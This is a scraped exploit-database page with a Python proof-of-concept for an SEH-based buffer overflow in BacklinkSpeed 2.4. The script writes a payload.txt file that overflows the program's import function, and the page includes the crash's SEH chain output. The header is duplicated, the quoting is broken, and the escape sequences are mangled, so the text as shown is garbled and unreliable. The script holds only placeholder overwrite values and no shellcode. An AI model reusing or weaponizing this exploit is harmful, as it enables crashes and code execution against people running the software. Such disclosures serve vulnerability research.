BacklinkSpeed 2.4 Buffer Overflow ≈ Packet Storm
#!/usr/bin/python
'''
# Exploit Title: BacklinkSpeed v2.4 Buffer Overflow PoC (SEH)
# Date: Aug-01-2020
# Exploit Author: Saeed reza Zamanian
# Vendor Homepage: http://www.dummysoftware.com
# Software Link: http://www.dummysoftware.com/backlinkspeed.html
# Version: 2.4
# Tested on:
Windows 10.0 x64 Build 10240
Windows 7 x64
Windows Vista x32 SP1
# Replicate Crash:
1) Install and Run the application
2) Run the exploit , the exploit create a text file named payload.txt
3) Press import button and open payload.txt
'''
# Exploit Title: BacklinkSpeed v2.4 Buffer Overflow PoC (SEH)
# Date: Aug-01-2020
# Exploit Author: Saeed reza Zamanian
# Vendor Homepage: http://www.dummysoftware.com
# Software Link: http://www.dummysoftware.com/backlinkspeed.html
# Version: 2.4
# Tested on:
Windows 10.0 x64 Build 10240
Windows 7 x64
Windows Vista x32 SP1
# Replicate Crash:
1) Install and Run the application
2) Run the exploit , the exploit create a text file named payload.txt
3) Press import button and open payload.txt
|----------------------------------|
| SEH chain of thread 00000350 |
| Address SE handler |
| 42424242 *** CORRUPT ENTRY *** |
| |
| EIP : 43434343 |
|----------------------------------|
'''
nSEH = "BBBB"
SEH = "CCCC"
payload = "A"*5000+nSEH+"x90x90x90x90x90x90x90x90"+SEH
try:
f=open("payload.txt","w")
print("[+] Creating %s bytes payload." %len(payload))
f.write(payload)
f.close()
print("[+] File created!")
except:
print("File cannot be created.")
Gloss